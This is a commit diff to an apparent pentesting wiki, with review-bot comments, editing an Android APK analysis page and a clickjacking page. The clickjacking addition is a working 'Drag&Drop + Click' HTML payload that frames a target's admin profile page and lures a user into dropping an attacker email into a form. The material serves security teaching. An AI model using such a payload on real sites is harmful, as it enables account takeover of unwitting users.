GitBook: [master] 2 pages modified

This commit is contained in:
CPol 2020-10-13 11:29:54 +00:00 committed by gitbook-bot
parent b1b610b969
commit f1bf48f1df
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
2 changed files with 45 additions and 2 deletions

View file

@ -13,6 +13,8 @@ This introduction is taken from [https://maddiestone.github.io/AndroidAppRE/app\
* Android applications are in the _APK file format_. APK is basically a ZIP file. \(You can rename the file extension to .zip and use unzip to open and see its contents.\)
* APK Contents \(Not exhaustive\)
* AndroidManifest.xml
* resources.arsc/strings.xml
* res/xml/files\_paths.xml
* META-INF/
* Certificate lives here!
* classes.dex
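Review bot: the two added list items in this hunk use paths that do not exist inside an APK as written. `resources.arsc/strings.xml` conflates two things: `resources.arsc` is the compiled, binary resource table, and `strings.xml` only reappears as a readable file (under `res/values/strings.xml`) after decoding the APK with a tool such as apktool; a plain `unzip` will not give you a `strings.xml`. Suggest "resources.arsc (compiled resources, incl. the strings from strings.xml)". Likewise `res/xml/files_paths.xml` is not a fixed Android filename; it is whichever XML the app's FileProvider `<meta-data android:resource=...>` entry points at, and it matters because it declares which directories the provider exposes to other apps. A short parenthetical ("FileProvider paths: check which directories are shared") would tell the reader why the file is listed.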
@ -237,7 +239,7 @@ Just taking a look to the **strings** of the APK you can search for **passwords*
Pay special attention to **firebase URLs** and check if it is bad configured. [More information about whats is FIrebase and how to exploit it here.](../../pentesting/pentesting-web/buckets/firebase-database.md)
### Basic understanding of the application - Manifest.xml
### Basic understanding of the application - Manifest.xml, strings.xml
Using any of the **decompilers** mentioned [**here** ](apk-decompilers.md)you will be able to read the _Manifest.xml_. You could also **rename** the **apk** file extension **to .zip** and **unzip** it.
Reading the **manifest** you can find **vulnerabilities**:
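Review bot: the heading now promises `strings.xml`, but the paragraph under it only explains how to read `Manifest.xml`, and the fallback it offers (rename to `.zip` and unzip) does not work for either file: an unzipped APK contains a binary-encoded `AndroidManifest.xml` and a binary `resources.arsc`, not readable XML. Suggest stating that both files become readable only via the decompilers linked above (apktool decodes them to plain XML), and dropping or qualifying the unzip sentence. While touching this hunk, the context line above has two typos ("whats is FIrebase"; "bad configured" should read "misconfigured").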
@ -255,6 +257,12 @@ Reading the **manifest** you can find **vulnerabilities**:
* **Broadcast Receivers**: [You will learn how you can possibly exploit them](./#exploiting-broadcast-receivers) during the dynamic analysis.
* **URL scheme**: Read the code of the activity managing the schema and look for vulnerabilities managing the input of the user. More info about [what is an URL scheme here](./#url-schemes).
Reading **resources.arsc/strings.xml** you can find some **interesting info**:
* API Keys
* Custom schemas
* Other interesting info developers save in this file
### Insecure data storage
#### Internal Storage
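Review bot: the added bullet list is inconsistent with the section it joins and too vague to act on. "Custom schemas" should be "custom URL schemes" to match the `**URL scheme**` bullet and the `./#url-schemes` anchor a few lines above, and "Other interesting info developers save in this file" should name what a reviewer actually looks for in the decoded string table, e.g. backend and Firebase URLs (which ties this to the Firebase paragraph earlier in this file) and hard-coded credentials. Also use the same file wording as the rest of the page (`res/values/strings.xml` after decoding) rather than `resources.arsc/strings.xml`, and note that any such key found here is a finding in its own right: secrets in client resources are recoverable by anyone with the APK and should be moved server-side or rotated.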

View file

@ -6,7 +6,11 @@ Clickjacking is an attack that **tricks** a **user** into **clicking** a webpage
### Prepopulate forms trick
Sometimes is possible to fill the value of fields of a form using GET parameters when loading a page. An attacker may abuse this behaviours to fill a form with arbitrary data and send the clickjacking payload so the user press the button Submit.
Sometimes is possible to **fill the value of fields of a form using GET parameters when loading a page**. An attacker may abuse this behaviours to fill a form with arbitrary data and send the clickjacking payload so the user press the button Submit.
### Populate form with Drag&Drop
If you need the user to **fill a form** but you don't want to directly ask him to write some specific information \(like your email or and specific password that you know\), you can just ask him to **Drag&Drop** something that will write your controlled data like in [**this example**](https://lutfumertceylan.com.tr/posts/clickjacking-acc-takeover-drag-drop/).
### Basic Payload
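Review bot: the rewritten sentence keeps the grammar errors of the line it replaces and the new paragraph adds a few more; since both lines are being edited anyway, fix them here. Suggested wording for the first: "Sometimes it is possible to **fill in the fields of a form using GET parameters when loading a page**. An attacker may abuse this behaviour to fill a form with arbitrary data and then send the clickjacking payload so that the user presses the Submit button." For the Drag&Drop paragraph: "... ask them to write some specific information (like your email or a specific password that you know), you can instead ask them to **drag and drop** something that will write your controlled data, as in [this example](...)". Both tricks only work if the page can be framed at all, so it is worth a sentence that the defence is the same as for the rest of the page (deny framing with `X-Frame-Options` / CSP `frame-ancestors`).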
@ -56,6 +60,37 @@ Sometimes is possible to fill the value of fields of a form using GET parameters
<iframe src="https://vulnerable.net/account"></iframe>
```
### Drag&Drop + Click payload
```markup
<html>
<head>
<style>
#payload{
position: absolute;
top: 20px;
}
iframe{
width: 1000px;
height: 675px;
border: none;
}
.xss{
position: fixed;
background: #F00;
}
</style>
</head>
<body>
<div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.</div>
<div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete button</div>
<div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click me</div>
<iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts" style="opacity:0.3"src="https://target.com/panel/administration/profile/"></iframe>
<div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
</body>
</html>
```
### XSS + Clickjacking
If you have identified a **XSS attack that requires a user to click** on some element to **trigger** the XSS and the page is **vulnerable to clickjacking**, you could abuse it to trick the user into clicking the button/link.
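Review bot: the `<iframe>` line in the added payload is missing the whitespace separator between two attributes (`style="opacity:0.3"src=...`); browsers happen to tolerate this, but it should read `style="opacity:0.3" src=...`. Two readability points in the same block: the `.xss` class is applied to the overlay `div`s that guide the victim's clicks and has nothing to do with XSS, so a name like `.overlay` would avoid confusion with the "XSS + Clickjacking" section that follows; and the literal values `https://target.com/panel/administration/profile/` and `attacker@gmail.com` are real domains, so prefer reserved placeholders (`example.com`, `attacker@example.com`) in example code. Finally, the numbered overlays say "Click and press delete", "DRAG ME" and "Click me" but the surrounding text never explains that the sequence is: clear the existing field, drop the attacker-controlled value into it, submit; a one-line description above the fence would make the example self-explanatory.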